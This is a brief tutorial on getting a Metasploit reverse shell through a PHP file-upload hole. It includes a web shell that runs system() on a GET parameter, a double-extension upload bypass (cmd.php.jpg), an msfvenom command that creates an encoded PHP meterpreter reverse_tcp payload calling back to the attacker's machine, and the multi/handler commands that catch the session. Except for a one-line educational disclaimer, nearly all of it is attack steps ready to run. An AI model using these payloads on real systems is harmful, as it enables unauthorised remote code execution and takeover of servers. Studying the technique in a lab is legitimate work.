Metasploit, Reverse shell



Before we start

– only for educational purpose

What you need

  • Target machine (192.168.0.102) with php app where you can upload file
  • Kali linux machine (192.168.0.104)

Start

To start play with Reverse shell and metasploit you have to have app where you have possibility to upload php file or php.jpg file :D.

How to test

Try to upload simple php file, if you will meet any problem please play with extension or content type.

Test file

Content-Disposition: form-data; name="file"; filename="cmd.php.jpg"
Content-Type: application/x-php

<?php 
	if(isset($_GET['cmd'])) {
		echo "<pre>";
		system($_GET['cmd']);
		echo "</pre>";
	}else{
		echo "lol";
	}
?>

Confirm

You have to confirms that file was uploaded and you can execute it, for example by visiting url 192.168.0.102/uploads/cmd.php.jpg?cmd=ls -la



Metasploit / Kali & Update

I tested this on metasploit v4.16.21-dev, if your version is outdated, consider update

apt update; apt install metasploit-framework

generate exploit

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.0.104 LPORT=4444 -e php/base64 -f raw > msfvenom2.php.jpg

Important you have to edit ‘msfvenom2.php.jpg’ and wrap payload by

<?php ... ?>

if you are ready please upload this file to server

Hammer time

in msf console, type

msf > 
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf exploit(multi/handler) > set LHOST 192.168.0.104
LHOST => 192.168.0.104
msf exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf exploit(multi/handler) > exploit

and visit this page: 192.168.0.102/uploads/msfvenom2.php.jpg
bumm, now you should have Reverse shell, type something in msf console like “ls” or “pwd” to have more options type “shell”